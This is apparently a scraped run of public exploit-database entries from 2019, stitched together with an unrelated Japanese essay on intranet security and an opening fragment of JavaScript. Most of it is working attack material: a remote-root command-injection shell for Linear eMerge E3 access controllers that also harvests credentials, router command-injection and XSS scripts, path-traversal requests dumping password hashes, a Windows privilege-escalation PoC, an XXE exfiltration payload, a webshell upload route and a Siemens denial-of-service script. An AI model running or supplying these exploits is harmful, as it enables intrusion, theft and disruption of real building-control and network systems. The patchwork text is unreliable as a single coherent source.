"/fudforum/adm/admuser.php", true); req.responseType = "document"; req.send(); patience();

# Title: Linear eMerge E3 1.00-06 - Remote Code Execution # Author: LiquidWorm # Date: 2019-11-13 # Vendor Homepage: http://linear-solutions.com/nsc_family/e3-series/ # Software Link: http://linear-solutions.com/nsc_family/e3-series/ # Affected version: <=2.3.0a # Advisory: https://applied-risk.com/resources/ar-2019-005 # Paper: https://applied-risk.com/resources/i-own-your-building-management-system # CVE: CVE-2019-7256 #!/usr/bin/env python # # Linear eMerge E3 Unauthenticated Command Injection Remote Root Exploit # Affected version: <=1.00-06 # via card_scan_decoder.php # CVE: CVE-2019-7256 # Advisory: https://applied-risk.com/resources/ar-2019-005 # Paper: https://applied-risk.com/resources/i-own-your-building-management-system # # By Gjoko 'LiquidWorm' Krstic # ######################################################################### # lqwrm@metalgear:~/stuff$ python emergeroot2.py 192.168.1.2 # Do you want me to try and get the web front-end credentials? (y/n) y # ID='admin',Password='MakeLoveNotWar!' # # lighttpd@192.168.1.2:/spider/web/webroot$ id # uid=1003(lighttpd) gid=0(root) # # lighttpd@192.168.1.2:/spider/web/webroot$ cat /etc/version # Software Version: 1.00.03 # Image: nxgcpub-image # Built by: jenkins # # lighttpd@192.168.1.2:/spider/web/webroot$ echo davestyle |su -c id # Password: # uid=0(root) gid=0(root) groups=0(root) # # lighttpd@192.168.1.2:/spider/web/webroot$ exit # # [+] Erasing read stage file and exiting... # [+] Done. Ba-bye! # ######################################################################### import requests import time#### import sys##### import os###### import re###### piton = os.path.basename(sys.argv[0]) if len(sys.argv) < 2: print ''' ..... .e$$$$$$$$$$$$$$e. z$$ ^$$$$$$$$$$$$$$$$$. .$$$* J$$$$$$$$$$$$$$$$$$$e .$" .$$$$$$$$$$$$$$$$$$$$$$*- .$ $$$$$$$$$$$$$$$$***$$ .ee" z**$$ $$r ^**$$$$$$$$$*" .e$$$$$$*" " -\e$$ 4$$$$. .ze$$$"""" 4 z$$$$$ $$$$$$$$$$$$$$$$$$$$" $$$$$$$$ .$$$$$$$$$$$**$$$$*" z$$" $$ $$$$P*"" J$*$$c $$" $$F .$$$ $$ ^$$ $$ *$$c.z$$$ $$ $$ $P $$$$$$$ 4$F 4$ dP *$$$" $$ '$r .$ J$" $" $ $P 4$ F $$ 4$ 4$% 4$ $$ 4$ d$" $$ $P $$ $$ $$ 4$% $$ $$ $$ d$ $$ $F "3 r=4e=" ... ..rf . ""% $**$*"^""=..^4*=4=^"" ^""" ''' print '\n\x20\x20[+] Linear eMerge E3 Remote Root Exploit' print '\x20\x20[-] by lqwrm (c) 2019' print '\n\x20\x20[*] Usage: '+piton+' <ipaddress:port>\n' sys.exit() ipaddr = sys.argv[1] creds = raw_input('Do you want me to try and get the web front-end credentials? (y/n) ') if creds.strip() == 'y': frontend = '''grep "Controller" /tmp/SpiderDB/Spider.db |cut -f 5,6 -d ',' |grep ID''' requests.get('http://'+ipaddr+'/card_scan_decoder.php?No=30&door=%60'+frontend+' > test.txt%60') showme = requests.get('http://'+ipaddr+'/test.txt') print showme.text while True: try: cmd = raw_input('lighttpd@'+ipaddr+':/spider/web/webroot$ ') execute = requests.get('http://'+ipaddr+'/card_scan_decoder.php?No=30&door=%60'+cmd+' > test.txt%60') #time.sleep(1); readreq = requests.get('http://'+ipaddr+'/test.txt') print readreq.text if cmd.strip() == 'exit': print "[+] Erasing read stage file and exiting..." requests.get('http://'+ipaddr+'/card_scan_decoder.php?No=30&ReaderNo=%60rm test.txt%60') print "[+] Done. Ba-bye!\n" break else: continue except Exception: break sys.exit()

# Exploit Title: Technicolor TC7300.B0 - 'hostname' Persistent Cross-Site Scripting # Google Dork: N/A # Date: 2019-11-11 # Exploit Author: Luis Stefan # Vendor Homepage: https://www.technicolor.com/ # Software Link: N/A # Version: TC7300.B0 - STFA.51.20 # Tested on: macOS Mojave and Catalina # CVE : #!/usr/bin/env python3 __author__ = "Luis Stefan" __license__ = "MIT" __version__ = "1.0" __email__ = "luis.ss@protonmail.com" __description__ = """CVE-2019-17524.py: This script is used to exploit a xss vulnerability found in a technicolor device.""" from enum import IntEnum from scapy.all import * import codecs, threading, time # Define your network interface interface = 'en0' # Insert your interface card mac address mac = 'xx:xx:xx:xx:xx:xx' broadcast = 'ff:ff:ff:ff:ff:ff' mac_hxd = codecs.decode(mac.replace(':', ''),'hex') class Bootp(IntEnum): Discover = 1 Offer = 2 Request = 3 Decline = 4 Ack = 5 Nak = 6 Release = 7 def dhcp_discover(): disc_pkt = Ether(src=mac, dst=broadcast) / \ IP(src='0.0.0.0', dst='255.255.255.255') / \ UDP(dport=67, sport=68) / BOOTP(chaddr=mac_hxd) / \ DHCP(options=[('message-type', 'discover'), 'end']) sendp(disc_pkt, iface=interface) def dhcp_request(pkt): yraddr = pkt['BOOTP'].yraddr # gwaddr == Gateway Ip Address gwaddr = '192.168.0.1' param_req_list = [] hostname = "<script>alert('XSS triggered')</script>" req_pkt = Ether(src=mac, dst=broadcast) / \ IP(src='0.0.0.0', dst='255.255.255.255') / \ UDP(dport=67, sport=68) / BOOTP(chaddr=mac_hxd) / \ DHCP(options=[('message-type', 'request'), ('server_id', gwaddr), ('requested_addr', yraddr), ('hostname', hostname), 'end']) sendp(req_pkt, iface=interface) def dhcp(pkt): print(pkt.display()) print("#############################################################") if pkt.haslayer(DHCP) and pkt['DHCP'].options[0][1] == Bootp.Offer: dhcp_request(pkt) elif pkt.haslayer(DHCP) and pkt['DHCP'].options[0][1] == Bootp.Ack: print("Server Acknowledged") sys.exit(0) elif pkt.haslayer(DHCP) and pkt['DHCP'].options[0][1] == Bootp.Decline: print("Server Declined") sys.exit(0) elif pkt.haslayer(DHCP) and pkt['DHCP'].options[0][1] == Bootp.Nak: print("Server Nak") sys.exit(0) def ver_dhcp(): print("Verifying DHCP port traffic..") sniff(iface=interface, prn=dhcp, filter="port 68 and port 67", timeout=20) sys.exit(0) def main(): t1 = threading.Thread(target=ver_dhcp, args=()) t1.setDaemon = True t1.start() time.sleep(2) dhcp_discover() if __name__ == "__main__": main()

# Exploit Title: Technicolor TD5130.2 - Remote Command Execution # Date: 2019-11-12 # Exploit Author: João Teles # Vendor Homepage: https://www.technicolor.com/ # Version: TD5130v2 # Firmware Version: OI_Fw_V20 # CVE : CVE-2019-18396 --------------------------- POST /mnt_ping.cgi HTTP/1.1 Host: HOST User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http:/HOST/mnt_ping.cgi Content-Type: application/x-www-form-urlencoded Content-Length: 53 Cookie: session=COOKIE Connection: close Upgrade-Insecure-Requests: 1 isSubmit=1&addrType=3&pingAddr=;ls&send=Send

# Exploit Title: Fastweb Fastgate 0.00.81 - Remote Code Execution # Date: 2019-11-13 # Exploit Author: Riccardo Gasparini # Vendor Homepage: https://www.fastweb.it/ # Software Link: http://59.0.121.191:8080/ACS-server/file/0.00.81_FW_200_Askey (only from Fastweb ISP network) # Version: 0.00.81 # Tested on: Linux # CVE : N/A import requests, json, time, sys current_milli_time = lambda: int(round(time.time() * 1000)) password='XXXXXXXXXXXXXXX' if password == 'XXXXXXXXXXXXXXX': print("Password is set to XXXXXXXXXXXXXXX\nOpen the script and change the password") sys.exit(-1) #get XSRF-TOKEN headers = { 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36', 'Referer': 'http://192.168.1.254/tr069', } params = () response = requests.get('http://192.168.1.254', headers=headers) #login request and get sessionKey xsrfToken=response.cookies['XSRF-TOKEN'] cookies = { 'XSRF-TOKEN': xsrfToken, } headers = { 'Pragma': 'no-cache', 'X-XSRF-TOKEN': xsrfToken, 'Accept-Language': 'en-US,en-GB;q=0.9,en;q=0.8,it-IT;q=0.7,it;q=0.6,es;q=0.5,de;q=0.4', 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36', 'Accept': 'application/json, text/plain, */*', 'Referer': 'http://192.168.1.254/tr069', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Cache-Control': 'no-cache', } params = ( ('_', str(current_milli_time())), ('cmd', '3'), ('nvget', 'login_confirm'), ('password', password), ('remember_me', '1'), ('sessionKey', 'NULL'), ('username', 'admin'), ) response = requests.get('http://192.168.1.254/status.cgi', headers=headers, params=params, cookies=cookies) jsonResponse = json.loads(response.text) sessionKey=jsonResponse["login_confirm"]["check_session"] print("Executing command reboot\n") #some commands as example are shown below in the mount parameter params = ( ('_', str(current_milli_time())), ('act','nvset'), ('service','usb_remove'), #Code execution #('mount','&ping -c 10 192.168.1.172&'), #('mount','&dropbear -r /etc/dropbear/dropbear_rsa_host_key&'),#to enable SSH ('mount','&reboot&'), ('sessionKey', sessionKey), ) response = requests.get('http://192.168.1.254/status.cgi', headers=headers, params=params, cookies=cookies) print(response.text) #logout params = ( ('_', str(current_milli_time())), ('cmd', '5'), ('nvget', 'login_confirm'), ('sessionKey', sessionKey), ) response = requests.get('http://192.168.1.254/status.cgi', headers=headers, params=params, cookies=cookies) print(json.dumps(json.loads(response.text), indent=2))

# Title: gSOAP 2.8 - Directory Traversal # Author: Numan Türle # Date: 2019-11-13 # Vendor Homepage: https://www.genivia.com/ # Version : gSOAP 2.8 # Software Link : https://www.genivia.com/products.html#gsoap POC --------- GET /../../../../../../../../../etc/passwd HTTP/1.1 Host: 10.200.106.101 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 Accept-Encoding: gzip, deflate Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close Response --------- HTTP/1.1 200 OK Server: gSOAP/2.8 Content-Type: application/octet-stream Content-Length: 51 Connection: close root:$1$$qRPK7m23GJusamGpoGLby/:0:0::/root:/bin/sh

# Exploit Title: ScanGuard Antivirus 2020 - Insecure Folder Permissions # Date: 2019-10-10 # Exploit Author: hyp3rlinx # Vendor Homepage: https://www.scanguard.com/ # Software Link: https://support.scanguard.com/en/kb/22/upgrades-available # Version: 2020 # Tested on: Windows # CVE : N/A # Category: exploit SCANGUARD-ANTIVIRUS-INSECURE-PERMISSIONS.txt [+] Credits: hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/SCANGUARD-ANTIVIRUS-INSECURE-PERMISSIONS.txt [+] ISR: ApparitionSec [Vendor] https://www.scanguard.com [Product] ScanGuard Antivirus ScanGuard_Setup.exe Hash: 1a63c67a249da0c2e9abd09d35c3c65d Complete Antivirus & Security Software [Vulnerability Type] Insecure Permissions [CVE Reference] CVE-2019-18895 [Affected Product Code Base] ScanGuard Antivirus - latest [Affected Component] Permissions on installation directory [Attack Type] Local [Impact Code execution] true [Impact Escalation of Privileges] true [Impact Information Disclosure] true [Attack Vectors] Low integrity malware or non-privileged user replaces an executable to gain Admin privileges. [Reference] https://support.scanguard.com/en/kb/22/upgrades-available [Security Issue] Scanguard through 2019-11-12 on Windows has Insecure Permissions for the installation directory, leading to privilege escalation via a Trojan horse executable file. The product sets weak access control restrictions, as permissions are set to Full Control for Everyone group. This can allow low integrity malware the ability to replace ScanGuard executables. C:\Program Files (x86)\ScanGuard\bins BUILTIN\Users:(OI)(CI)(ID)F Everyone:(OI)(CI)(ID)F NT SERVICE\TrustedInstaller:(ID)F NT SERVICE\TrustedInstaller:(CI)(IO)(ID)F NT AUTHORITY\SYSTEM:(ID)F [Exploit/POC] #include <stdio.h> #include <windows.h> #define TARGET "C:\\Program Files (x86)\\ScanGuard\\ScanGuard.exe" #define DISABLED_TARGET "C:\\Program Files (x86)\\ScanGuard\\~.conf" /* ScanGuard EoP PoC By hyp3rlinx */ BOOL PWNED=FALSE; BOOL FileExists(LPCTSTR szPath){ DWORD dwAttrib = GetFileAttributes(szPath); return (dwAttrib != INVALID_FILE_ATTRIBUTES && !(dwAttrib & FILE_ATTRIBUTE_DIRECTORY)); } void main(void){ if(!FileExists(DISABLED_TARGET)){ rename(TARGET, DISABLED_TARGET); printf("[+] ScanGuard Antivirus EoP PoC\n"); Sleep(300); printf("[+] Disabled ScanGuard.exe ...\n"); Sleep(300); }else{ PWNED=TRUE; } char fname[MAX_PATH]; char newLoc[]=TARGET; DWORD size = GetModuleFileNameA(NULL, fname, MAX_PATH); if (size){ if(!PWNED){ printf("[+] Copying exploit to vuln dir...\n"); Sleep(300); CopyFile(fname, newLoc, FALSE); printf("[+] Replaced legit ScanGuard...\n"); Sleep(300); printf("[+] Done!\n"); Sleep(300); MoveFile(fname, "c:\\Program Files (x86)\\ScanGuard\\ScamGuard.lnk"); Sleep(2000); exit(0); }else{ if(FileExists("ScamGuard.lnk")){ system("DEL /f ScamGuard.lnk"); } printf("[+] ScamGuard PWNED!!!"); printf("[+] By hyp3rlinx\n"); system("pause"); } } } [Disclosure Timeline] Vendor Notification: September 16, 2019 Received vendor acknowledgement: September 16, 2019 Second contact follow up: September 29, 2019 No more vendor replies. November 12, 2019 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx

# Exploit Title: Xfilesharing 2.5.1 - Arbitrary File Upload # Google Dork: inurl:/?op=registration # Date: 2019-11-4 # Exploit Author: Noman Riffat # Vendor Homepage: https://sibsoft.net/xfilesharing.html # Version: <=2.5.1 # CVE : CVE-2019-18951, CVE-2019-18952 ##################### Arbitrary File Upload ##################### <form action="http://xyz.com/cgi-bin/up.cgi" method="post" enctype="multipart/form-data"> <input type="text" name="sid" value="joe"> <input type="file" name="file"> <input type="submit" value="Upload" name="submit"> </form> Shell : http://xyz.com/cgi-bin/temp/joe/shell.php #################### Local File Inclusion #################### http://xyz.com/?op=page&tmpl=../../admin_settings This URL will fetch "admin_settings.html" template without any authentication. The ".html" extension is hard coded on the server so the included file must be with html extension anywhere on the server. You can even merge LFI with Arbitrary File Upload vulnerability by uploading an html file i.e. "upload.html" and changing the "sid" to "../../../../../../tmp" and so the file gets uploaded in tmp directory of the server. Now you can include the file like following. http://xyz.com/?op=page&tmpl=../../../../../../../tmp/upload The Xfilesharing script has builtin shortcodes as well so you can achieve RCE by including them in that "upload.html" file. Noman Riffat, National Security Services Group Oman @nomanriffat, @nssgoman

# Exploit Title: oXygen XML Editor 21.1.1 - XML External Entity Injection # Author: Pablo Santiago # Date: 2019-11-13 # Vendor Homepage: https://www.oxygenxml.com/ # Source:https://www.oxygenxml.com/xml_editor/download_oxygenxml_editor.html # Version: 21.1.1 # CVE : N/A # Tested on: Windows 7 #PoC 1- python -m SimpleHTTPServer 8000 1.1- Poc.xml : <?xml version="1.0"?> <!DOCTYPE test [ <!ENTITY % file SYSTEM "C:\Windows\win.ini"> <!ENTITY % dtd SYSTEM "http://localhost:8000/payload.dtd"> %dtd;]> <pwn>&send;</pwn> 1.2.- payload.dtd <?xml version="1.0" encoding="UTF-8"?> <!ENTITY % all "<!ENTITY send SYSTEM 'http://localhost:8000?%file;'>"> %all; 2- File -> Open -> *.xml #PoC Visual https://imgur.com/2H8DhL9

# Title: Siemens Desigo PX 6.00 - Denial of Service (PoC) # Author: LiquidWorm # Date: 2019-11-14 # Vendor web page: https://www.siemens.com # Product web page: https://new.siemens.com/global/en/products/buildings/automation/desigo.html # Affected version:6.00 # Affected version: Model: PXC00-E.D, PXC50-E.D, PXC100-E.D, PXC200-E.D # With Desigo PX Web modules: PXA40-W0, PXA40-W1, PXA40-W2 # All firmware versions < V6.00.320 # ------ # Model: PXC00-U, PXC64-U, PXC128-U # With Desigo PX Web modules: PXA30-W0, PXA30-W1, PXA30-W2 # All firmware versions < V6.00.320 # ------ # Model: PXC22.1-E.D, PXC36-E.D, PXC36.1-E.D # With activated web server # All firmware versions < V6.00.320 # CVE: N/A # Advisory ID: ZSL-2019-5542 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5542.php #!/bin/bash # # # Siemens Desigo PX V6.00 Web Remote Denial of Service Exploit # # # Vendor: Siemens AG # Vendor web page: https://www.siemens.com # Product web page: https://new.siemens.com/global/en/products/buildings/automation/desigo.html # # Summary: Desigo PX is a modern building automation and control # system for the entire field of building service plants. Scalable # from small to large projects with highest degree of energy efficiency, # openness and user-friendly operation. # # Desc: The device contains a vulnerability that could allow an attacker # to cause a denial of service condition on the device's web server # by sending a specially crafted HTTP message to the web server port # (tcp/80). The security vulnerability could be exploited by an attacker # with network access to an affected device. Successful exploitation # requires no system privileges and no user interaction. An attacker # could use the vulnerability to compromise the availability of the # device's web service. While the device itself stays operational, the # web server responds with HTTP status code 404 (Not found) to any further # request. A reboot is required to recover the web interface. # # Tested on: HP StorageWorks MSL4048 httpd # # ================================================================================ # Expected result after sending the directory traversal sequence: /dir?dir=../../: # -------------------------------------------------------------------------------- # # $ curl http://10.0.0.17/index.htm # <HEAD><TITLE>404 Not Found</TITLE></HEAD> # <BODY><H1>404 Not Found</H1> # Url '/INDEX.HTM' not found on server<P> # </BODY> # # ================================================================================ # # # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # Zero Science Lab - https://www.zeroscience.mk # @zeroscience # # # # Vendor ID: SSA-898181 # Vendor Fix: https://support.industry.siemens.com/cs/document/109772802 # Vendor Advisory PDF: https://cert-portal.siemens.com/productcert/pdf/ssa-898181.pdf # Vendor Advisory TXT: https://cert-portal.siemens.com/productcert/txt/ssa-898181.txt # Vendor ACK: https://new.siemens.com/global/en/products/services/cert/hall-of-thanks.html # # CWE ID: CWE-472: External Control of Assumed-Immutable Web Parameter # CWE URL: https://cwe.mitre.org/data/definitions/472.html # CVE ID: CVE-2019-13927 # CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13927 # CVSS v3.1 Base Score: 5.3 # CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L/E:H/RL:O/RC:C # # # 06.06.2019 # echo -ne "\n----------------------------------" echo -ne "\nSiemens Desigo PX HTTP Web RMI DoS" echo -ne "\n----------------------------------\n" if [ "$#" -ne 1 ]; then echo -ne "\nUsage: $0 [ipaddr]\n\n" exit fi IP=$1 TARGET="http://$IP/" PAYLOAD=`echo -ne "\x64\x69\x72\x3f\x64\x69\x72\x3d\x2e\x2e\x2f\x2e\x2e\x2f"` echo -ne "\n[+] Sending payload to $IP on port 80." curl -s "$TARGET$PAYLOAD" > /dev/null echo -ne "\n[*] Done" echo -ne "\n[+] Checking if exploit was successful..." status=$(curl -Is http://$IP/index.htm 2>/dev/null | head -1 | awk -F" " '{print $2}') if [ "$status" == "404" ]; then echo -ne "\n[*] Exploit successful!\n" else echo -ne "\n[-] Exploit unsuccessful.\n" exit fi

イントラネットセキュリティ操作 イントラネットセキュリティ操作とは、会社の内部生産オフィスネットワークを指します。一般的に、従来の企業は、生産ネットワーク（産業制御ネットワーク）を指し、オフィスネットワークは一般に、企業の内部システム（ドキュメントサーバー、OAシステム、金融、特許、人事、その他のビジネスシステム）および従業員のオフィスコンピューターネットワークを指します。インターネットまたはITエンタープライズの場合、生産ネットワークは一般に外部の世界（公式ウェブサイト、メインサイト、CDNなど）にのみサービスを提供し、オフィスネットワークは従来の企業と一致しており、テストネットワークはテスト環境の開発に使用されるネットワークを指します。インターネットまたはITエンタープライズの3つのネットワークを分離することをお勧めします。 生産ネットワークセキュリティ操作 生産ネットワークの場合、採用された運用戦略はオフィスイントラネットの戦略と似ていますが、ビジネスのアイデアは異なります。第一に、生産ネットワークは企業のライフラインであり、金融機関が主催するオフィスネットワークと同様に、ビジネスを分解することはできません。したがって、まず第一に、ビジネスの可用性とビジネスデータの確保を検討してください。ダブルコピーシステムまたは複数のシステムを達成することをお勧めします。見つかった脆弱性については、まだオンラインでサービスを提供していないバックアップノードを修復することが優先されます。修理が成功した後、メインノードとバックアップノードが交換され、元のメインノードと現在のバックアップノードが修復されます。さらに、生産ネットワークは最も安定している必要があります。ビジネスに必要なポートのみを外部から開設する必要があります。オフィスネットワークから内部的にアクセスした生産ネットワークは、完全な認証と監査を実現するために、要塞マシンに渡す必要があります。 オフィスイントラネットセキュリティ操作 Office Intranetの場合、高防御ゾーンを形成する必要があります。 AD、DHCP、DNS、OA、電子メール、ERP、CRM、特許、財務、採用、法律問題、投資、ドキュメント、IMコミュニケーション、Wiki、プロジェクト、バージョンコントロールなどの主要な敏感なシステムは、ハイディフェンスゾーンに配置する必要があります。ログを完全に収集し、監査と早期警告監視を確保し、これらのシステムの保護に焦点を当てます。これらのシステムは、外部からビジネス需要ポートを開発するだけです。ゲートウェイネットワークセグメント（メンテナンスネットワーク）は、アクセス権限を個別に設定し、イントラネットロジックから分離する必要があります。基本的な従業員ホストの場合、多くのガードやバトラーなどの統一HIDS製品を装備する必要があります。これらのHIDSコントロールノードをイントラネットで操作するのが最適です。 ネットワークセキュリティ操作をテスト 一般に、テストネットワークに厳密なセキュリティポリシーの制限を実装することは推奨されませんが、テストネットワーク（Bastion Machine）のアクセス権とアクセス方法は、ホワイトリスト制御を実現するために厳密に制限する必要があり、テストサービスはオフィスネットワークと生産ネットワークに接続されていません。 安全操作の初期焦点 脆弱性とイベント処理 上記の2つは基本的に三段論法、発見とディスポスの改善 に過ぎません

# Exploit Title: Shrew Soft VPN Client 2.2.2 - 'iked' Unquoted Service Path # Date: 2019-11-14 # Exploit Author: D.Goedecke # Vendor Homepage: www.shrew.net # Software Link: https://www.shrew.net/download/vpn/vpn-client-2.2.2-release.exe # Version: 2.2.2 # Tested on: Windows 10 64bit C:\Users\user>wmic service get name, displayname, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """ ShrewSoft IKE Daemon iked C:\Program Files\ShrewSoft\VPN Client\iked.exe -service Auto ShrewSoft IPSEC Daemon ipsecd C:\Program Files\ShrewSoft\VPN Client\ipsecd.exe -service Auto C:\Users\user>sc qc iked [SC] QueryServiceConfig SUCCESS SERVICE_NAME: iked TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files\ShrewSoft\VPN Client\iked.exe -service LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : ShrewSoft IKE Daemon DEPENDENCIES : SERVICE_START_NAME : LocalSystem C:\Users\user>sc qc ipsecd [SC] QueryServiceConfig SUCCESS SERVICE_NAME: ipsecd TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files\ShrewSoft\VPN Client\ipsecd.exe -service LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : ShrewSoft IPSEC Daemon DEPENDENCIES : SERVICE_START_NAME : LocalSystem #Exploit: ============ A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.

# Exploit Title: Emerson PAC Machine Edition 9.70 Build 8595 - 'FxControlRuntime' Unquoted Service Path # Discovery by: Luis Martinez # Discovery Date: 2019-11-17 # Vendor Homepage: https://www.emerson.com/en-us # Software Link : https://www.opertek.com/descargar-software/?prc=_326 # Tested Version: 9.70 Build 8595 # Vulnerability Type: Unquoted Service Path # Tested on OS: Windows 10 Pro x64 es # Step to discover Unquoted Service Path: C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "FxControlRuntime" |findstr /i /v """ FxControl Runtime FxControlRuntime C:\Program Files (x86)\Emerson\PAC Machine Edition\fxControl\Runtime\NT\FxControl.exe Auto # Service info: C:\>sc qc FxControlRuntime [SC] QueryServiceConfig SUCCESS SERVICE_NAME: FxControlRuntime TYPE : 120 WIN32_SHARE_PROCESS (interactive) START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\Emerson\PAC Machine Edition\fxControl\Runtime\NT\FxControl.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : FxControl Runtime DEPENDENCIES : SERVICE_START_NAME : LocalSystem #Exploit: A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.

# Exploit Title: ASUS HM Com Service 1.00.31 - 'asHMComSvc' Unquoted Service Path # Date: 2019-11-16 # Exploit Author : Olimpia Saucedo # Vendor Homepage: www.asus.com # Version: 1.00.31 # Tested on: Windows 10 Pro x64 (but it should works on all windows version) The application suffers from an unquoted service path issue impacting the service 'ASUS HM Com Service (aaHMSvc.exe)' related to the Asus Motherboard Utilities. This could potentially allow an authorized but non-privileged local user to execute arbitrary code with system privileges. POC: >wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """ ASUS HM Com Service asHmComSvc C:\Program Files (x86)\ASUS\AAHM\1.00.31\aaHMSvc.exe Auto >sc qc "asHMComSvc" [SC] QueryServiceConfig SUCCESS SERVICE_NAME: asHMComSvc TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\ASUS\AAHM\1.00.31\aaHMSvc.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : ASUS HM Com Service DEPENDENCIES : RpcSs SERVICE_START_NAME : LocalSystem

# Exploit Title: Lexmark Services Monitor 2.27.4.0.39 - Directory Traversal # Google Dork: N/A # Date: 2019-11-15 # Exploit Author: Kevin Randall # Vendor Homepage: https://www.lexmark.com/en_us.html # Software Link: https://www.lexmark.com/en_us.html # Version: 2.27.4.0.39 (Latest Version) # Tested on: Windows Server 2012 # CVE : CVE-2019-16758 Vulnerability: Lexmark Services Monitor (Version 2.27.4.0.39) Runs on TCP Port 2070. The latest version is vulnerable to a Directory Traversal and Local File Inclusion vulnerability. Timeline: Discovered on: 9/24/2019 Vendor Notified: 9/24/2019 Vendor Confirmed Receipt of Vulnerability: 9/24/2019 Follow up with Vendor: 9/25/2019 Vendor Sent to Engineers to confirm validity: 9/25/2019 - 9/26/2019 Vendor Confirmed Vulnerability is Valid: 9/26/2019 Vendor Said Software is EOL (End of Life). Users should upgrade/migrate all LSM with LRAM. No fix/patch will be made: 9/27/2019 Vendor Confirmed Signoff to Disclose: 9/27/2019 Final Email Sent: 9/27/2019 Public Disclosure: 11/15/2019 PoC: GET /../../../../../../windows/SysWOW64/PerfStringBackup.ini HTTP/1.1 TE: deflate,gzip;q=0.3 Connection: TE, close Host: 10.200.15.70:2070 User-Agent: Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20 HTTP/1.0 200 OK Server: rXpress Content-Length: 848536 . . . .[.P.e.r.f.l.i.b.]. . .B.a.s.e. .I.n.d.e.x.=.1.8.4.7. . .L.a.s.t. .C.o.u.n.t.e.r.=.3.3.3.4.6. . .L.a.s.t. .H.e.l.p.=.3.3.3.4.7. . . . .[.P.E.R.F._...N.E.T. .C.L.R. .D.a.t.a.]. . .F.i.r.s.t. .C.o.u.n.t.e.r.=.5.0.2.8. . .F.i.r.s.t. .H.e.l.p.=.5.0.2.9. . .L.a.s.t. .C.o.u.n.t.e.r.=.5.0.4.0. . .L.a.s.t. .H.e.l.p.=.5.0.4.1. . . . .[.P.E.R.F._...N.E.T. .C.L.R. .N.e.t.w.o.r.k.i.n.g.]. . .F.i.r.s.t. .C.o.u.n.t.e.r.=.4.9.8.6. GET /../../../../../windows/SysWOW64/slmgr/0409/slmgr.ini HTTP/1.1 TE: deflate,gzip;q=0.3 Connection: TE, close Host: 10.200.15.70:2070 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.3 HTTP/1.0 200 OK Server: rXpress Content-Length: 38710 ..[.S.t.r.i.n.g.s.]. . .L._.o.p.t.I.n.s.t.a.l.l.P.r.o.d.u.c.t.K.e.y.=.".i.p.k.". . .L._.o.p.t.I.n.s.t.a.l.l.P.r.o.d.u.c.t.K.e.y.U.s.a.g.e.=.".I.n.s.t.a.l.l. .p.r.o.d.u.c.t. .k.e.y. .(.r.e.p.l.a.c.e.s. .e.x.i.s.t.i.n.g. .k.e.y.).". . .L._.o.p.t.U.n.i.n.s.t.a.l.l.P.r.o.d.u.c.t.K.e.y.=.".u.p.k.". . .L._.o.p.t.U.n.i.n.s.t.a.l.l.P.r.o.d.u.c.t.K.e.y.U.s.a.g.e.=.".U.n.i.n.s.t.a.l.l. .p.r.o.d.u.c.t. .k.e.y.". . .L._.o.p.t.A.c.t.i.v.a.t.e.P.r.o.d.u.c.t.=.".a.t.o.". . .L._.o.p.t.A.c.t.i.v.a.t.e.P.r.o.d.u.c.t.U.s.a.g.e.=.".A.c.t.i.v.a.t.e. .W.i.n.d.o.w.s.". . .L._.o.p.t.D.i.s.p.l.a.y.I.n.f.o.r.m.a.t.i.o.n.=.".d.l.i.". . 